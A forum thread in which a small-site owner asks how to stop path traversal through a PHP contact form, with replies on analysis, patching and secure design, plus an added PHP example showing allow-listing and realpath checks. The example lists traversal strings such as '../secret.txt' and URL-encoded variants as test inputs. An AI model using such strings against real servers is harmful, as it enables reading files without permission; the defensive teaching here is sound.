Prevent LFI and Path Traversal

 
Ranch Hand
I'm hosting a small website on a XAMPP server at home. Yes, I know, you shouldn't use XAMPP in production, but it's a simple informational website.
Be that as it may, yesterday someone managed, by sending emails through the contact form, to traverse the path and open files on my computer.
I noticed what he was doing before he could do any harm. It's my first attack, and the question arises: how do I prevent visitors from exploiting my path?
 
Bartender
Well, analyse the attack. What about the emails caused files to be opened? What files got opened? Why does the code for the contact form have access to the file system at all? How did you detect the attack?
 
Pieter Jansens
Ranch Hand
I detected the attack because I got spammed with email. When checking the emails I noticed he was using the name and subject line of the contact form to navigate my path.
I instinctively shut my server down, more so because I had never come across it; I actually didn't know what was happening, I just knew something wasn't right.
A Google search later, it seems like textbook path traversal. I started by validating the input fields of my form better; I think that would be the first and most important step?!
And that's about how far I've got so far.
 
Pieter Jansens
Ranch Hand
I should express myself better. I guess he (or she) didn't traverse the path by sending emails; they used it to somehow explore my files and then used the browser to navigate.

Apart from making sure my input fields match the required regular expression, this is the main thing I do now that I didn't before:


By stripping all backslashes and converting special characters to HTML entities, I should be able to prevent users from executing scripts on my server. I guess that should be enough?
 
Saloon Keeper
I wouldn't consider XAMPP to be especially bad for a production environment. Some or all of the XAMPP components host, for example, Wikipedia.

The PHP language is a little weak on security compared to JEE, but then most non-JEE language environments are. Perl, of course, is dangerous in anyone's hands.

So to avoid abuse, there are a couple of things you can do.

First of all, consider a firewall. I routinely blocked traffic from Korea and Russia because of so much bad-faith traffic I saw coming from there. Not long ago, I even went out and bought an actual firewall appliance on eBay to choke off a lot of stuff before it annoyed my server's own firewalls. The device is past vendor end-of-life, but I don't need its fancier features (where most of the security patches are needed), so it was a worthwhile purchase.

Secondly, keep the XAMPP system and the OS up to date. Security fixes come out all the time. And in the "X" part, while Windows is a LOT more secure than it used to be, Linux is a lot easier to keep updated, especially if you want to be in control of the updating.

And finally, most importantly, be paranoid when you design apps for the system. All the firewalls and security patches in the world won't help if you don't code secure apps.
 
Stephan van Hulst
Bartender

Pieter Jansens wrote: By stripping all backslashes and converting special characters to HTML entities, I should be able to prevent users from executing scripts on my server. I guess that should be enough?


No.

The problem is that you're doing something with the data that you're not supposed to. What parts of your code are handling the data from the e-mails? Where does it get stored? What do you do with it on the way to storage, and what do you do with the data when you retrieve it from storage?

The correct way to deal with the input data depends on what parts of your application the data flows through.

Can you also share with us an example of an e-mail sent to your application?
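The following is an added example, not code from this thread or from Pieter's site. It shows why the "strip backslashes and HTML-encode" filter discussed above does nothing against a traversal string, and what a script that does serve files by name should do instead: allow-list the name, canonicalise it with realpath(), and confirm the canonical path still sits under a fixed base directory. The base directory, the naiveSanitise and resolveWithinBase functions, and the attack strings are all assumptions constructed for illustration; it needs PHP 7.4 or later.

```php
<?php
declare(strict_types=1);

// Added example, not code from the thread. Assumes PHP 7.4+ and builds a
// hypothetical "pages" directory inside the system temp dir so it runs offline.

/** The filter proposed in the thread: remove backslashes, encode HTML entities. */
function naiveSanitise(string $value): string
{
    return htmlentities(str_replace('\\', '', $value), ENT_QUOTES, 'UTF-8');
}

/**
 * Resolve $requested inside $baseDir. Returns the canonical absolute path, or
 * null when the request must be refused (disallowed characters, missing file,
 * or a canonical path that lies outside the base directory).
 */
function resolveWithinBase(string $baseDir, string $requested): ?string
{
    // Allow-list first: a plain page name with a single ".html" suffix.
    if (preg_match('/^[A-Za-z0-9_-]{1,64}\.html$/', $requested) !== 1) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;                               // base directory missing
    }
    // realpath() collapses "..", "." and symlinks, so the prefix check below
    // compares canonical forms rather than the attacker's spelling of the path.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($candidate === false) {
        return null;                               // no such file (say no more)
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($candidate, $prefix, strlen($prefix)) === 0 ? $candidate : null;
}

// --- demonstration on a throw-away directory tree ---------------------------
$root  = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lfi-demo-' . getmypid();
$pages = $root . DIRECTORY_SEPARATOR . 'pages';
mkdir($pages, 0700, true);
file_put_contents($pages . DIRECTORY_SEPARATOR . 'about.html', '<h1>About</h1>');
file_put_contents($root . DIRECTORY_SEPARATOR . 'secret.txt', 'db password');

// Constructed inputs: one legitimate request and four traversal attempts.
$inputs = [
    'about.html',                  // legitimate page
    '../secret.txt',               // classic traversal; the naive filter leaves it intact
    '..\\secret.txt',              // backslash variant; stripping yields "..secret.txt"
    '%2e%2e%2fsecret.txt',         // on-the-wire form; PHP decodes it to "../secret.txt" before $_GET
    'about.html/../../secret.txt', // would pass a bare "ends with .html" check on the prefix
];

foreach ($inputs as $input) {
    $naive = naiveSanitise($input);
    $safe  = resolveWithinBase($pages, $input);
    printf("%-30s naive=%-28s safe=%s\n", $input, $naive, $safe ?? 'REFUSED');
}

// Clean up the temporary tree.
unlink($pages . DIRECTORY_SEPARATOR . 'about.html');
unlink($root . DIRECTORY_SEPARATOR . 'secret.txt');
rmdir($pages);
rmdir($root);
```

Run it with `php lfi-demo.php`: every input except `about.html` is refused, while the naive filter hands back `../secret.txt` unchanged, because neither backslash removal nor HTML encoding touches `.` or `/`. The point Stephan makes still stands ahead of any filter: a contact form that only mails its fields should never turn them into a file path, and if no code does so, the traversal has to be coming from some other script or from the server itself.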
 
Pieter Jansens
Ranch Hand
It's a pure HTML and CSS website; the only PHP I use is the mail script and to display a message after the contact form is sent.
I'm not doing anything at all with the information besides mailing it to myself.
He left a fingerprint though: he used Acunetix Website Security Scanner to scan for vulnerabilities, and I have his account name.

This is an example mail:


 